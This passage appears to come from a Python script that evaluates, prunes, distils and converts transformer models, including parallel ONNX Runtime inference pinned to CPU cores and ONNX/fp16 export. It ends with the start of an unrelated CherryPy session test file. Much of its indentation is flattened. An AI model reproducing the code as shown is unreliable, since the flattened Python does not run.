return result, physical_processor_ids
input_queue = Queue()
result_queue = Queue()
def evaluate_ort_parallel(args, task_name, onnx_session_options, tokenizer, split="dev", prefix="", use_tqdm=True):
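    """Evaluate with ONNX Runtime using one worker process per group of physical cores.

    Each worker is pinned to its cores with taskset, batches are distributed via a
    queue, and results are re-ordered by batch id before computing metrics.
    """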
results = {}
if task_name == "record":
eval_dataset, eval_answers = load_and_cache_examples(args, task_name, tokenizer, split=split)
else:
eval_dataset = load_and_cache_examples(args, task_name, tokenizer, split=split)
eval_answers = None
if not os.path.exists(args.output_dir) and args.local_rank in [-1, 0]:
os.makedirs(args.output_dir)
args.eval_batch_size = args.per_instance_eval_batch_size * max(1, args.n_gpu)
eval_sampler = SequentialSampler(eval_dataset)
eval_dataloader = DataLoader(eval_dataset, sampler=eval_sampler, batch_size=args.eval_batch_size)
# multi-core eval
# import psutil
# num_cores = psutil.cpu_count(logical=False)
num_cores, processor_list = cpu_count_physical()
# print(processor_list)
threads_per_instance = args.threads_per_instance
if args.threads_per_instance < 0:
threads_per_instance = num_cores
    num_instances = num_cores // threads_per_instance
assert num_instances <= num_cores
def _worker_proc(input_queue, results_q):
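        # Each worker owns its own InferenceSession and pulls batches off the queue until it sees the None sentinel.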
from onnxruntime import ExecutionMode, InferenceSession, SessionOptions
onnx_session = InferenceSession(args.model_name_or_path + '/model.onnx', onnx_session_options)
while True:
try:
input = input_queue.get()
if input is None: # exit
break
t0 = time.time()
output = onnx_session.run(None, input[1])
results_q.put((input[0], output, input[2], input[3], time.time() - t0))
except Exception:
output = ExceptionWrapper(
where="in guid {}".format(-1))
results_q.put((-1, output))
assert False
# create processes
for i in range(num_instances):
p = Process(target=_worker_proc, args=(input_queue, result_queue))
p.start()
# pin processes to cores
lpids = ''
for j in range(threads_per_instance):
lpids += str(processor_list[i*threads_per_instance + j])
if j < threads_per_instance - 1:
lpids += ','
os.system("taskset -p -c " + lpids + " " + str(p.pid))
# Eval!
wallclock_start = time.time()
logger.info(f"***** Running evaluation: {prefix} on {task_name} {split} *****")
logger.info(" Num examples = %d", len(eval_dataset))
logger.info(" Batch size = %d", args.eval_batch_size)
preds = None
out_label_ids = None
ex_ids = None
batch_id = 0
for batch in eval_dataloader:
batch = tuple(t.to(args.device) for t in batch)
guids = batch[-1]
labels_input = batch[3]
batch_seq_length = torch.max(batch[-2], 0)[0].item()
inputs = {'input_ids': batch[0][:,:batch_seq_length].contiguous().cpu().detach().numpy(),
'attention_mask': batch[1][:,:batch_seq_length].contiguous().cpu().detach().numpy()}
if args.model_type in ["bert", "xlnet", "albert"]:
inputs["token_type_ids"] = batch[2][:,:batch_seq_length].contiguous().cpu().detach().numpy()
        # Put the query on the queue for the ONNX Runtime worker processes to consume
input_queue.put((batch_id, inputs, guids.detach().cpu().numpy(), labels_input.detach().cpu().numpy()))
batch_id += 1
# exit signal at the end of the Q
for _ in range(num_instances):
input_queue.put(None)
    # It's a bit slower with heappush/heappop, so just use a PriorityQueue.
result_tmp_q = PriorityQueue(batch_id)
while not result_tmp_q.full():
if not result_queue.empty():
output_with_id = result_queue.get()
result_tmp_q.put((output_with_id[0], output_with_id[1:]))
else:
time.sleep(.1)
total_time = 0.
while not result_tmp_q.empty():
output_with_id = result_tmp_q.get()
logits = output_with_id[1][0]
guids = output_with_id[1][1]
        input_labels = output_with_id[1][2]
        total_time += output_with_id[1][3]
        if preds is None:
            preds = logits[0]
            out_label_ids = input_labels
            ex_ids = [guids]
        else:
            preds = np.append(preds, logits[0], axis=0)
            out_label_ids = np.append(out_label_ids, input_labels, axis=0)
ex_ids.append(guids)
assert len(ex_ids) == batch_id
print("############## Average latency: ", str(total_time / batch_id))
print("############## Total time spent (wallclock time): ", str(time.time() - wallclock_start))
ex_ids = np.concatenate(ex_ids, axis=0)
if args.output_mode in ["classification", "span_classification"] and args.task_name not in ["record"]:
preds = np.argmax(preds, axis=1)
elif args.output_mode == "regression":
preds = np.squeeze(preds)
if split != "test":
# don't have access to test labels, so skip evaluating on them
# NB(AW): forcing evaluation on ReCoRD on test (no labels) will error
result = compute_metrics(task_name, preds, out_label_ids, guids=ex_ids, answers=eval_answers)
results.update(result)
output_eval_file = os.path.join(args.output_dir, prefix, "eval_results.txt")
with open(output_eval_file, "w") as writer:
logger.info(f"***** {split} results: {prefix} *****")
for key in sorted(result.keys()):
logger.info(" %s = %s", key, str(result[key]))
writer.write("%s = %s\n" % (key, str(result[key])))
return results, preds, ex_ids
def load_and_cache_examples(args, task, tokenizer, split="train"):
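    """Build (or load from cache) a TensorDataset of features for the given split.

    For ReCoRD, the dev/test answers are returned alongside the dataset.
    """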
    if args.local_rank not in [-1, 0] and split not in ["dev", "test"]:
        torch.distributed.barrier()  # Make sure only the first process in distributed training processes the dataset; the others will use the cache
processor = processors[task]()
output_mode = output_modes[task]
# Load data features from cache or dataset file
cached_tensors_file = os.path.join(
args.data_dir,
"tensors_{}_{}_{}_{}_{}".format(
split, list(filter(None, args.model_name_or_path.split("/"))).pop(), str(args.max_seq_length), str(task), str(args.do_lower_case)
),
)
if os.path.exists(cached_tensors_file) and not args.overwrite_cache:
logger.info("Loading tensors from cached file %s", cached_tensors_file)
start_time = time.time()
dataset = torch.load(cached_tensors_file)
logger.info("\tFinished loading tensors")
logger.info(f"\tin {time.time() - start_time}s")
else:
# no cached tensors, process data from scratch
logger.info("Creating features from dataset file at %s", args.data_dir)
label_list = processor.get_labels()
if split == "train":
get_examples = processor.get_train_examples
elif split == "dev":
get_examples = processor.get_dev_examples
elif split == "test":
get_examples = processor.get_test_examples
examples = get_examples(args.data_dir)
features = convert_examples_to_features(
examples,
tokenizer,
label_list=label_list,
max_length=args.max_seq_length,
output_mode=output_mode,
pad_on_left=bool(args.model_type in ["xlnet"]), # pad on the left for xlnet
pad_token=tokenizer.convert_tokens_to_ids([tokenizer.pad_token])[0],
pad_token_segment_id=4 if args.model_type in ["xlnet"] else 0,
)
logger.info("\tFinished creating features")
    if args.local_rank == 0 and split not in ["dev", "test"]:
        torch.distributed.barrier()  # Make sure only the first process in distributed training processes the dataset; the others will use the cache
# Convert to Tensors and build dataset
logger.info("Converting features into tensors")
all_guids = torch.tensor([f.guid for f in features], dtype=torch.long)
all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long)
all_attention_mask = torch.tensor([f.attention_mask for f in features], dtype=torch.long)
all_token_type_ids = torch.tensor([f.token_type_ids for f in features], dtype=torch.long)
all_seq_lengths = torch.tensor([f.seq_length for f in features], dtype=torch.long)
if output_mode in ["classification", "span_classification"]:
all_labels = torch.tensor([f.label for f in features], dtype=torch.long)
elif output_mode == "regression":
all_labels = torch.tensor([f.label for f in features], dtype=torch.float)
if output_mode in ["span_classification"]:
# all_starts = torch.tensor([[s[0] for s in f.span_locs] for f in features], dtype=torch.long)
# all_ends = torch.tensor([[s[1] for s in f.span_locs] for f in features], dtype=torch.long)
all_spans = torch.tensor([f.span_locs for f in features])
dataset = TensorDataset(
all_input_ids, all_attention_mask, all_token_type_ids, all_labels, all_spans, all_seq_lengths, all_guids
)
else:
dataset = TensorDataset(all_input_ids, all_attention_mask, all_token_type_ids, all_labels, all_seq_lengths, all_guids)
logger.info("\tFinished converting features into tensors")
if args.local_rank in [-1, 0]:
logger.info("Saving features into cached file %s", cached_tensors_file)
torch.save(dataset, cached_tensors_file)
logger.info("\tFinished saving tensors")
if args.task_name == "record" and split in ["dev", "test"]:
answers = processor.get_answers(args.data_dir, split)
return dataset, answers
else:
return dataset
def convert_model_to_onnx(args):
"""Converts a pytorch model checkpoint to an ONNX model."""
from torch.onnx import export
# Prepare task
args.task_name = args.task_name.lower()
assert args.task_name in processors, f"Task {args.task_name} not found!"
processor = processors[args.task_name]()
args.output_mode = output_modes[args.task_name]
label_list = processor.get_labels()
num_labels = len(label_list)
# Load pretrained model and tokenizer
args.model_type = args.model_type.lower()
config_class, tokenizer_class, model_classes = MODEL_CLASSES[args.model_type]
model_class = model_classes[args.output_mode]
# config
config = config_class.from_pretrained(
args.config_name if args.config_name else args.model_name_or_path,
num_labels=num_labels,
finetuning_task=args.task_name,
cache_dir=args.cache_dir if args.cache_dir else None,
)
if args.output_mode == "span_classification":
config.num_spans = task_spans[args.task_name]
# tokenizer
tokenizer = tokenizer_class.from_pretrained(
args.tokenizer_name if args.tokenizer_name else args.model_name_or_path,
do_lower_case=args.do_lower_case,
cache_dir=args.cache_dir if args.cache_dir else None,
)
tokens = tokenizer.encode_plus("This is a sample input.")
print(">>>>>>> Sample input: This is a sample input.")
print(tokens)
# model
model = model_class.from_pretrained(
args.model_name_or_path,
from_tf=bool(".ckpt" in args.model_name_or_path),
config=config,
cache_dir=args.cache_dir if args.cache_dir else None,
)
# Only CPU is supported
model.to(torch.device("cpu"))
model.eval()
print(">>>>>>> Model loaded.")
# onnx convert
input_names = ['input_ids', 'attention_mask']
output_names = ['output_0']
dynamic_axes = {
'attention_mask': {
0: 'batch',
1: 'sequence'
},
'input_ids': {
0: 'batch',
1: 'sequence'
},
'output_0': {
0: 'batch',
1: 'sequence'
}
}
if args.model_type in ["bert", "xlnet", "albert"]:
input_names.append('token_type_ids')
dynamic_axes["token_type_ids"] = {0: 'batch', 1: 'sequence'}
model_args = (torch.tensor(tokens['input_ids']).unsqueeze(0),
torch.tensor(tokens['attention_mask']).unsqueeze(0))
if args.model_type in ["bert", "xlnet", "albert"]:
model_args = model_args + (torch.tensor(tokens['token_type_ids']).unsqueeze(0),)
print(">>>>>>> ONNX conversion started!")
torch.onnx.export(
model,
model_args,
f=(args.model_name_or_path + "/model.onnx"),
input_names=input_names,
output_names=output_names,
dynamic_axes=dynamic_axes,
do_constant_folding=True,
use_external_data_format=False,
enable_onnx_checker=True,
opset_version=11,
)
print(">>>>>>> Model converted into ONNX format and saved as: ",
(args.model_name_or_path + "/model.onnx"))
# Optimize ONNX graph
if not args.skip_graph_optimization:
optimize_onnx_graph(args, config)
# Run ONNX model after conversion
from onnxruntime import InferenceSession, SessionOptions
from onnxruntime.capi.onnxruntime_pybind11_state import RuntimeException
print("Checking ONNX model loading from: {}".format(args.model_name_or_path + "/model.onnx"))
try:
onnx_options = SessionOptions()
sess = InferenceSession(args.model_name_or_path + "/model.onnx", onnx_options)
print("Model loaded successfully.")
if args.model_type in ["bert", "xlnet", "albert"]:
output_onnx = sess.run(None, {'input_ids': [tokens['input_ids']],
'attention_mask': [tokens['attention_mask']],
'token_type_ids': [tokens['token_type_ids']]})
else:
output_onnx = sess.run(None, {'input_ids': [tokens['input_ids']],
'attention_mask': [tokens['attention_mask']]})
print(output_onnx)
except RuntimeException as re:
print("Error while loading the model: {}".format(re))
def optimize_onnx_graph(args, config):
""" Optimize ONNX model with graph optimizations and quantizations """
import inspect
from onnxruntime.transformers.optimizer import optimize_model
from onnxruntime.transformers.onnx_model_bert import BertOptimizationOptions
# various graph optimization options.
# ZCode uses all the optimizations by default.
# Whether to use quantization or not can be selected optionally.
optimization_options = BertOptimizationOptions('bert')
optimization_options.enable_gelu = True
optimization_options.enable_layer_norm = True
optimization_options.enable_attention = True
optimization_options.enable_skip_layer_norm = True
optimization_options.enable_embed_layer_norm = True
optimization_options.enable_bias_skip_layer_norm = True
optimization_options.enable_bias_gelu = True
optimization_options.enable_gelu_approximation = False
logger.warning(">>>>>>> Start optimizing ONNX graph")
optimizer = optimize_model(args.model_name_or_path + "/model.onnx",
model_type='bert',
num_heads=0,
hidden_size=0,
optimization_options=optimization_options,
opt_level=0,
use_gpu=False,
only_onnxruntime=False)
optimizer.save_model_to_file(args.model_name_or_path + "/model.onnx")
# whether to skip quantization
if args.skip_quantization:
logger.warning(">>>>>>> Finished optimizing ONNX graph without quantization")
else:
from onnxruntime.quantization import quantize_dynamic, QuantType
import onnx
onnx_opt_model = onnx.load(args.model_name_or_path + "/model.onnx")
quantize_dynamic(args.model_name_or_path + "/model.onnx",
args.model_name_or_path + "/model.onnx",
op_types_to_quantize=['MatMul', 'Attention'],
weight_type=QuantType.QInt8,
per_channel=True,
reduce_range=True,
nodes_to_exclude=args.nodes_to_exclude,
extra_options={'WeightSymmetric': False, 'MatMulConstBOnly': True})
logger.warning(">>>>>>> Finished optimizing ONNX graph with quantization")
def convert_model_to_fp16(args):
"""Converts a fp32 pytorch model checkpoint to a fp16 checkpoint."""
# Prepare task
args.task_name = args.task_name.lower()
assert args.task_name in processors, f"Task {args.task_name} not found!"
processor = processors[args.task_name]()
args.output_mode = output_modes[args.task_name]
label_list = processor.get_labels()
num_labels = len(label_list)
# Load pretrained model and tokenizer
args.model_type = args.model_type.lower()
config_class, tokenizer_class, model_classes = MODEL_CLASSES[args.model_type]
model_class = model_classes[args.output_mode]
# config
config = config_class.from_pretrained(
args.config_name if args.config_name else args.model_name_or_path,
num_labels=num_labels,
finetuning_task=args.task_name,
cache_dir=args.cache_dir if args.cache_dir else None,
)
if args.output_mode == "span_classification":
config.num_spans = task_spans[args.task_name]
# tokenizer
tokenizer = tokenizer_class.from_pretrained(
args.tokenizer_name if args.tokenizer_name else args.model_name_or_path,
do_lower_case=args.do_lower_case,
cache_dir=args.cache_dir if args.cache_dir else None,
)
# model
model = model_class.from_pretrained(
args.model_name_or_path,
from_tf=bool(".ckpt" in args.model_name_or_path),
config=config,
cache_dir=args.cache_dir if args.cache_dir else None,
)
# model.to(args.device)
model.eval()
print(">>>>>>> Model loaded.")
# convert to fp16 and save into fp16 directory
model.half()
from pathlib import Path
Path(args.model_name_or_path + "/fp16").mkdir(exist_ok=True)
model.save_pretrained(args.model_name_or_path + "/fp16")
tokenizer.save_pretrained(args.model_name_or_path + "/fp16")
config.save_pretrained(args.model_name_or_path + "/fp16")
print(">>>>>>> Model converted into fp16 and saved into: ",
(args.model_name_or_path + "/fp16"))
def main():
parser = argparse.ArgumentParser()
# Required parameters
parser.add_argument(
"--data_dir",
default=None,
type=str,
required=False,
help="The input data dir. Should contain the .tsv files (or other data files) for the task.",
)
parser.add_argument(
"--teacher_model_type",
default=None,
type=str,
required=False,
help="Model type selected in the list for teacher model: " + ", ".join(MODEL_CLASSES.keys()),
)
parser.add_argument(
"--model_type",
default=None,
type=str,
required=True,
help="Model type selected in the list for student model: " + ", ".join(MODEL_CLASSES.keys()),
)
parser.add_argument(
"--teacher_model_name_or_path",
default=None,
type=str,
required=False,
help="Path to pre-trained teacher model or shortcut name selected in the list: " + ", ".join(ALL_MODELS),
)
parser.add_argument(
"--model_name_or_path",
default=None,
type=str,
required=True,
help="Path to pre-trained student model or shortcut name selected in the list: " + ", ".join(ALL_MODELS),
)
parser.add_argument(
"--task_name",
default=None,
type=str,
required=True,
help="The name of the task to train selected in the list: " + ", ".join(processors.keys()),
)
parser.add_argument(
"--output_dir",
default=None,
type=str,
required=False,
help="The output directory where the model predictions and checkpoints will be written.",
)
# Other parameters
parser.add_argument(
"--config_name", default="", type=str, help="Pretrained config name or path if not the same as model_name",
)
parser.add_argument(
"--tokenizer_name",
default="",
type=str,
help="Pretrained tokenizer name or path if not the same as model_name",
)
parser.add_argument(
"--cache_dir",
default="",
type=str,
help="Where do you want to store the pre-trained models downloaded from s3",
)
parser.add_argument(
"--max_seq_length",
default=512,
type=int,
help="The maximum total input sequence length after tokenization. Sequences longer "
"than this will be truncated, sequences shorter will be padded.",
)
parser.add_argument("--do_train", action="store_true", help="Whether to run training.")
parser.add_argument("--do_eval", action="store_true", help="Whether to run eval on the dev set.")
parser.add_argument(
"--use_onnxrt",
action="store_true",
help="Whether to ONNX runtime for inference evaluation. ONNX converted file needs to be in the same directory."
)
parser.add_argument(
"--do_prune",
action="store_true",
help="Whether to prune the model on the dev set. This prunes the model to the target number of heads and the number of FFN states."
)
parser.add_argument(
"--target_num_heads",
default=12,
type=int,
help="The number of attention heads after pruning/rewiring.",
)
parser.add_argument(
"--target_ffn_dim",
default=3072,
type=int,
help="The dimension of FFN intermediate layer after pruning/rewiring.",
)
parser.add_argument(
"--dont_normalize_importance_by_layer", action="store_true", help="Don't normalize importance score by layers"
)
parser.add_argument(
"--dont_normalize_global_importance",
action="store_true",
help="Don't normalize all importance scores between 0 and 1",
)
parser.add_argument(
"--log_evaluate_during_training",
action="store_true",
help="Run evaluation during training at each logging step.",
)
parser.add_argument(
"--do_lower_case", action="store_true", help="Set this flag if you are using an uncased model.",
)
parser.add_argument(
"--per_gpu_train_batch_size", default=8, type=int, help="Batch size per GPU/CPU for training.",
)
parser.add_argument(
"--per_instance_eval_batch_size", default=8, type=int, help="Batch size per GPU/CPU for evaluation.",
)
parser.add_argument(
"--gradient_accumulation_steps",
type=int,
default=1,
help="Number of updates steps to accumulate before performing a backward/update pass.",
)
parser.add_argument("--learning_rate", default=5e-5, type=float, help="The initial learning rate for Adam.")
parser.add_argument("--weight_decay", default=0.0, type=float, help="Weight decay if we apply some.")
parser.add_argument("--adam_epsilon", default=1e-8, type=float, help="Epsilon for Adam optimizer.")
parser.add_argument("--max_grad_norm", default=1.0, type=float, help="Max gradient norm.")
parser.add_argument(
"--num_train_epochs", default=3.0, type=float, help="Total number of training epochs to perform.",
)
parser.add_argument(
"--max_steps",
default=-1,
type=int,
help="If > 0: set total number of training steps to perform. Override num_train_epochs.",
)
parser.add_argument("--warmup_steps", default=0, type=int, help="Linear warmup over warmup_steps.")
parser.add_argument("--warmup_ratio", default=0, type=float, help="Linear warmup over warmup_steps as a float.")
parser.add_argument("--log_energy_consumption", action="store_true", help="Whether to track energy consumption")
parser.add_argument("--logging_steps", type=int, default=500, help="Log every X updates steps.")
parser.add_argument("--eval_and_save_steps", type=int, default=500, help="Save checkpoint every X updates steps.")
parser.add_argument("--save_only_best", action="store_true", help="Save only when hit best validation score.")
parser.add_argument(
"--eval_all_checkpoints",
action="store_true",
help="Evaluate all checkpoints starting with the same prefix as model_name ending and ending with step number",
)
parser.add_argument("--evaluate_test", action="store_true", help="Evaluate on the test splits.")
parser.add_argument("--skip_evaluate_dev", action="store_true", help="Skip final evaluation on the dev splits.")
parser.add_argument("--no_cuda", action="store_true", help="Avoid using CUDA when available")
parser.add_argument(
"--overwrite_output_dir", action="store_true", help="Overwrite the content of the output directory",
)
parser.add_argument(
"--overwrite_cache", action="store_true", help="Overwrite the cached training and evaluation sets",
)
parser.add_argument("--seed", type=int, default=42, help="random seed for initialization")
parser.add_argument(
"--fp16",
action="store_true",
help="Whether to use 16-bit (mixed) precision (through NVIDIA apex) instead of 32-bit",
)
parser.add_argument(
"--fp16_opt_level",
type=str,
default="O1",
help="For fp16: Apex AMP optimization level selected in ['O0', 'O1', 'O2', and 'O3']."
"See details at https://nvidia.github.io/apex/amp.html",
)
parser.add_argument("--use_gpuid", type=int, default=-1, help="Use a specific GPU only")
parser.add_argument("--local_rank", type=int, default=-1, help="For distributed training: local_rank")
parser.add_argument("--server_ip", type=str, default="", help="For distant debugging.")
parser.add_argument("--server_port", type=str, default="", help="For distant debugging.")
parser.add_argument("--convert_onnx", action="store_true", help="Convert a pytorch model to onnx format")
parser.add_argument("--convert_fp16", action="store_true", help="Convert a pytorch model to a half precision model")
parser.add_argument("--threads_per_instance", type=int, default=-1, help="Number of threads for one inference instance.")
parser.add_argument("--state_distill_cs", action="store_true", help="If this is using Cosine similarity for the hidden and embedding state distillation. vs. MSE")
parser.add_argument('--state_loss_ratio', type=float, default=0.1)
parser.add_argument('--att_loss_ratio', type=float, default=0.0)
parser.add_argument("--save_latest", action="store_true", help="Save the last checkpoint regardless of the score.")
parser.add_argument("--skip_graph_optimization", action="store_true", help="Whether to skip ONNX graph optimization.")
parser.add_argument("--skip_quantization", action="store_true", help="Whether to skip 8-bit quantization.")
parser.add_argument("--use_fixed_seq_length", action="store_true", help="Whether to use fixed sequence length.")
parser.add_argument("--nodes_to_exclude", nargs='*', default=[], help="Nodes to be excluded from quantization")
args = parser.parse_args()
# Setup logging
logging.basicConfig(
# format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
format="%(asctime)s: %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO if args.local_rank in [-1, 0] else logging.WARN,
)
if args.convert_onnx:
convert_model_to_onnx(args)
return
if args.convert_fp16:
convert_model_to_fp16(args)
return
# Launch impact tracker
if args.log_energy_consumption:
from experiment_impact_tracker.compute_tracker import ImpactTracker
logger.info("Launching impact tracker...")
tracker = ImpactTracker(args.output_dir)
tracker.launch_impact_monitor()
if (
os.path.exists(args.output_dir)
and os.listdir(args.output_dir)
and args.do_train
and not args.overwrite_output_dir
):
raise ValueError(
"Output directory ({}) already exists and is not empty. Use --overwrite_output_dir to overcome.".format(
args.output_dir
)
)
# Setup distant debugging if needed
if args.server_ip and args.server_port:
# Distant debugging - see https://code.visualstudio.com/docs/python/debugging#_attach-to-a-local-script
import ptvsd
print("Waiting for debugger attach")
ptvsd.enable_attach(address=(args.server_ip, args.server_port), redirect_output=True)
ptvsd.wait_for_attach()
# Setup CUDA, GPU & distributed training
if args.use_gpuid > -1:
device = args.use_gpuid
args.n_gpu = 1
elif args.local_rank == -1 or args.no_cuda:
device = torch.device("cuda" if torch.cuda.is_available() and not args.no_cuda else "cpu")
args.n_gpu = 0 if args.no_cuda else torch.cuda.device_count()
else: # Initializes the distributed backend which will take care of sychronizing nodes/GPUs
torch.cuda.set_device(args.local_rank)
device = torch.device("cuda", args.local_rank)
torch.distributed.init_process_group(backend="nccl")
args.n_gpu = 1
args.device = device
logger.warning(
"Process rank: %s, device: %s, n_gpu: %s, distributed training: %s, 16-bits training: %s",
args.local_rank,
device,
args.n_gpu,
bool(args.local_rank != -1),
args.fp16,
)
# Set seed
set_seed(args)
# Prepare task
args.task_name = args.task_name.lower()
assert args.task_name in processors, f"Task {args.task_name} not found!"
processor = processors[args.task_name]()
args.output_mode = output_modes[args.task_name]
label_list = processor.get_labels()
num_labels = len(label_list)
if args.use_onnxrt:
    assert args.do_eval and not args.do_train, "ONNX runtime can only be used in evaluation mode!"
# Do all the stuff you want only first process to do
# e.g. make sure only the first process will download model & vocab
if args.local_rank not in [-1, 0]:
torch.distributed.barrier()
# Load pretrained model and tokenizer
args.model_type = args.model_type.lower()
config_class, tokenizer_class, model_classes = MODEL_CLASSES[args.model_type]
model_class = model_classes[args.output_mode]
config = config_class.from_pretrained(
args.config_name if args.config_name else args.model_name_or_path,
num_labels=num_labels,
finetuning_task=args.task_name,
cache_dir=args.cache_dir if args.cache_dir else None,
)
if args.output_mode == "span_classification":
config.num_spans = task_spans[args.task_name]
tokenizer = tokenizer_class.from_pretrained(
args.tokenizer_name if args.tokenizer_name else args.model_name_or_path,
do_lower_case=args.do_lower_case,
cache_dir=args.cache_dir if args.cache_dir else None,
)
# For onnx model, it's loaded in the evaluation routine
if not args.use_onnxrt:
model = model_class.from_pretrained(
args.model_name_or_path,
from_tf=bool(".ckpt" in args.model_name_or_path),
config=config,
cache_dir=args.cache_dir if args.cache_dir else None,
)
if args.local_rank == 0:
torch.distributed.barrier() # Make sure only the first process in distributed training will download model & vocab
model.to(args.device)
logger.info("Training/evaluation parameters %s", args)
# Training
if args.do_train:
# normal training (fine-tuning)
if args.teacher_model_type is None or args.teacher_model_name_or_path is None:
train_dataset = load_and_cache_examples(args, args.task_name, tokenizer) #, evaluate=False)
global_step, tr_loss = train(args, train_dataset, model, tokenizer)
# distillation
else:
# Load pretrained teacher model (use the same tokenizer as student)
args.teacher_model_type = args.teacher_model_type.lower()
teacher_config_class, _, teacher_model_classes = MODEL_CLASSES[args.teacher_model_type]
teacher_model_class = teacher_model_classes[args.output_mode]
teacher_config = teacher_config_class.from_pretrained(
args.teacher_model_name_or_path,
num_labels=num_labels,
finetuning_task=args.task_name,
cache_dir=args.cache_dir if args.cache_dir else None,
)
if args.output_mode == "span_classification":
teacher_config.num_spans = task_spans[args.task_name]
teacher_model = teacher_model_class.from_pretrained(
args.teacher_model_name_or_path,
from_tf=bool(".ckpt" in args.teacher_model_name_or_path),
config=teacher_config,
cache_dir=args.cache_dir if args.cache_dir else None,
)
teacher_model.to(args.device)
train_dataset = load_and_cache_examples(args, args.task_name, tokenizer, split='train') # evaluate=False)
global_step, tr_loss = distill(
args,
train_dataset,
teacher_model,
model,
tokenizer)
logger.info(" global_step = %s, average loss = %s", global_step, tr_loss)
# Saving best-practices: if you use defaults names for the model, you can reload it using from_pretrained()
if args.do_train and (args.local_rank == -1 or torch.distributed.get_rank() == 0):
# Create output directory if needed
if not os.path.exists(args.output_dir) and args.local_rank in [-1, 0]:
os.makedirs(args.output_dir)
logger.info("Saving model checkpoint to %s", args.output_dir)
# Save a trained model, configuration and tokenizer using `save_pretrained()`.
# They can then be reloaded using `from_pretrained()`
model_to_save = (
model.module if hasattr(model, "module") else model
) # Take care of distributed/parallel training
model_to_save.save_pretrained(args.output_dir)
tokenizer.save_pretrained(args.output_dir)
# Good practice: save your training arguments together with the trained model
torch.save(args, os.path.join(args.output_dir, "training_args.bin"))
# Load a trained model and vocabulary that you have fine-tuned
model = model_class.from_pretrained(args.output_dir)
tokenizer = tokenizer_class.from_pretrained(args.output_dir)
model.to(args.device)
# Evaluation with the best checkpoint
if args.do_eval and args.local_rank in [-1, 0]:
tokenizer = tokenizer_class.from_pretrained(args.output_dir, do_lower_case=args.do_lower_case)
checkpoints = [os.path.join(args.output_dir, "checkpoint-best")]
if args.eval_all_checkpoints:
checkpoints = list(
os.path.dirname(c) for c in sorted(glob.glob(args.output_dir + "/**/" + WEIGHTS_NAME, recursive=True))
)
logging.getLogger("transformers.modeling_utils").setLevel(logging.WARN) # Reduce logging
logger.info("Evaluate the following checkpoints: %s", checkpoints)
for checkpoint in checkpoints:
global_step = checkpoint.split("-")[-1] # if len(checkpoints) > 1 else ""
prefix = checkpoint.split("/")[-1] if checkpoint.find("checkpoint") != -1 else ""
model = model_class.from_pretrained(checkpoint)
model.to(args.device)
if not args.skip_evaluate_dev:
result, preds, ex_ids = evaluate(args, args.task_name, model, tokenizer, prefix=prefix)
result = dict((f"{k}_{global_step}", v) for k, v in result.items())
if args.evaluate_test:
# Hack to handle diagnostic datasets
eval_task_names = ("rte", "ax-b", "ax-g") if args.task_name == "rte" else (args.task_name,)
for eval_task_name in eval_task_names:
result, preds, ex_ids = evaluate(
args, eval_task_name, model, tokenizer, split="test", prefix=prefix
)
processor = processors[eval_task_name]()
if args.task_name == "record":
answers = processor.get_answers(args.data_dir, "test")
processor.write_preds(preds, ex_ids, args.output_dir, answers=answers)
else:
processor.write_preds(preds, ex_ids, args.output_dir)
# Evaluation only
if args.do_eval and not args.do_train and args.local_rank in [-1, 0]:
# onnx based evaluation
if args.use_onnxrt:
from onnxruntime import ExecutionMode, InferenceSession, SessionOptions
onnx_options = SessionOptions()
onnx_options.intra_op_num_threads = args.threads_per_instance
onnx_options.execution_mode = ExecutionMode.ORT_SEQUENTIAL
if not args.skip_evaluate_dev:
result, preds, ex_ids = evaluate_ort_parallel(args, args.task_name, onnx_options, tokenizer, prefix="")
result = dict((f"{k}", v) for k, v in result.items())
if args.evaluate_test:
# Hack to handle diagnostic datasets
eval_task_names = (args.task_name,) # ("rte", "ax-b", "ax-g") if args.task_name == "rte" else (args.task_name,)
for eval_task_name in eval_task_names:
result, preds, ex_ids = evaluate_ort_parallel(
args, eval_task_name, onnx_options, tokenizer, split="test", prefix=""
)
processor = processors[eval_task_name]()
if args.task_name == "record":
answers = processor.get_answers(args.data_dir, "test")
processor.write_preds(preds, ex_ids, args.output_dir, answers=answers)
else:
processor.write_preds(preds, ex_ids, args.output_dir)
# network pruning
elif args.do_prune:
result, preds, ex_ids = prune_rewire(args, args.task_name, model, tokenizer, prefix="")
result = dict((f"{k}", v) for k, v in result.items())
print("before pruning" + str(result))
# evaluate after pruning
config = config_class.from_pretrained(
args.output_dir + "/pruned_" + str(int(args.target_num_heads)) + "_" + str(int(args.target_ffn_dim)) + "/",
num_labels=num_labels,
finetuning_task=args.task_name,
)
model = model_class.from_pretrained(args.output_dir + "/pruned_" + str(int(args.target_num_heads)) + "_" + str(int(args.target_ffn_dim)) + "/")
model.to(args.device)
result, preds, ex_ids = evaluate(args, args.task_name, model, tokenizer, prefix="")
result = dict((f"{k}", v) for k, v in result.items())
print("after pruning" + str(result))
# normal evaluation (pytorch)
else:
if not args.skip_evaluate_dev:
result, preds, ex_ids = evaluate(args, args.task_name, model, tokenizer, prefix="", use_tqdm=False)
result = dict((f"{k}", v) for k, v in result.items())
if args.evaluate_test:
# Hack to handle diagnostic datasets
eval_task_names = (args.task_name,) # ("rte", "ax-b", "ax-g") if args.task_name == "rte" else (args.task_name,)
for eval_task_name in eval_task_names:
result, preds, ex_ids = evaluate(
args, eval_task_name, model, tokenizer, split="test", prefix="", use_tqdm=False
)
processor = processors[eval_task_name]()
if args.task_name == "record":
answers = processor.get_answers(args.data_dir, "test")
processor.write_preds(preds, ex_ids, args.output_dir, answers=answers)
else:
processor.write_preds(preds, ex_ids, args.output_dir)
if __name__ == "__main__":
main()
|
test_session.py
|
import os
localDir = os.path.dirname(__file__)
import sys
import threading
import time
import cherrypy
from cherrypy._cpcompat import copykeys, HTTPConnection, HTTPSConnection
from cherrypy.lib import sessions
from cherrypy.lib.httputil import response_codes
def http_methods_allowed(methods=['GET', 'HEAD']):
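    # CherryPy tool hook: reject requests whose method is not in `methods` with a 405 and an Allow header.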
method = cherrypy.request.method.upper()
if method not in methods:
cherrypy.response.headers['Allow'] = ", ".join(methods)
raise cherrypy.HTTPError(405)
cherrypy.tools.allow = cherrypy.Tool('on_start_resource', http_methods_allowed)
def setup_server():
class Root:
_cp_config = {'tools.sessions.on': True,
'tools.sessions.storage_type' : 'ram',
'tools.sessions.storage_path' : localDir,
'tools.sessions.timeout': (1.0 / 60),
'tools.sessions.clean_freq': (1.0 / 60),
}
def clear(self):
cherrypy.session.cache.clear()
